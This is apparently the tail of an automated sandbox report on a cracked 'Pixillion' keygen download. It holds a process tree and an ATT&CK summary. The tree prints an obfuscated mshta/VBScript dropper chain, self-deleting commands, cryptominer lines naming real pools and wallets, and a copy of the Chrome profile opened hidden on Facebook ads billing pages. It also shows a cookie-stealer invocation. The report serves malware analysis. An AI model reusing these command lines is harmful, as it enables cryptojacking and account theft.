                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=936 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:4760
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:4892
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6480 /prefetch:2
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:2512
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1420 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:4272
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 /prefetch:8
                                                                                                                                            2⤵
                                                                                                                                              PID:4800
                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:732
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              2⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:216
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              2⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:2164
                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:3324
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_crack.zip\Pixillion_Bildkonverter_2_crack.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_crack.zip\Pixillion_Bildkonverter_2_crack.exe"
                                                                                                                                              1⤵
                                                                                                                                                PID:4924
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4144
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                      keygen-pr.exe -p83fsase3Ge
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4556
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:4308
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:504
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                      keygen-step-1.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4480
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                      keygen-step-5.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1176
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4276
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4952
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe
                                                                                                                                                                uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4076
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If ""-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:4728
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:1472
                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      "C:\Windows\System32\regsvr32.exe" /s .\n~8Q.O -U
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                      PID:4216
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill -f /IM "keygen-step-5.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:4524
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                              keygen-step-2.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:4388
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\9E44.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\9E44.tmp.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:3832
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\9E44.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4236
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:4924
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3096
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:3624
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                  keygen-step-3.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2188
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4768
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:3108
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                    keygen-step-4.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2904
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4172
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4832
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:4984
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\A6C0.tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\A6C0.tmp.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4152
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\A6C0.tmp.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\A6C0.tmp.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4596
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\A9BF.tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\A9BF.tmp.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4944
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12352 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                          PID:4260
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5488@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1528
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4708
                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:4628
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops Chrome extension
                                                                                                                                                                          PID:4076
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4444
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:4724
                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                              xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:5060
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:3112
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc1b424f50,0x7ffc1b424f60,0x7ffc1b424f70
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4328
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1696 /prefetch:8
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4868
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:360
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2784 /prefetch:8
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:1104
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1112
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4688
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:3860
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3240
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:3808
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,486783385285778979,9393347877890272716,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4156
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              PID:2312
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4332
                                                                                                                                                                                              • C:\ProgramData\1630596.exe
                                                                                                                                                                                                "C:\ProgramData\1630596.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:2608
                                                                                                                                                                                              • C:\ProgramData\4299371.exe
                                                                                                                                                                                                "C:\ProgramData\4299371.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                PID:2120
                                                                                                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                              • C:\ProgramData\175073.exe
                                                                                                                                                                                                "C:\ProgramData\175073.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:4732
                                                                                                                                                                                                • C:\ProgramData\175073.exe
                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:400
                                                                                                                                                                                              • C:\ProgramData\6503027.exe
                                                                                                                                                                                                "C:\ProgramData\6503027.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:1368
                                                                                                                                                                                              • C:\ProgramData\3960369.exe
                                                                                                                                                                                                "C:\ProgramData\3960369.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:1232
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:3516
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4580
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:1412
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:2352
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:3096
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3108

                                                                                                                                                                                        Network

                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                        Persistence

                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                        1
                                                                                                                                                                                        T1060

                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                        2
                                                                                                                                                                                        T1112

                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                        1
                                                                                                                                                                                        T1130

                                                                                                                                                                                        Credential Access

                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                        5
                                                                                                                                                                                        T1081

                                                                                                                                                                                        Discovery

                                                                                                                                                                                        Query Registry

                                                                                                                                                                                        3
                                                                                                                                                                                        T1012

                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                        4
                                                                                                                                                                                        T1082

                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                        1
                                                                                                                                                                                        T1018

                                                                                                                                                                                        Collection

                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                        5
                                                                                                                                                                                        T1005

                                                                                                                                                                                        Command and Control

                                                                                                                                                                                        Web Service

                                                                                                                                                                                        1
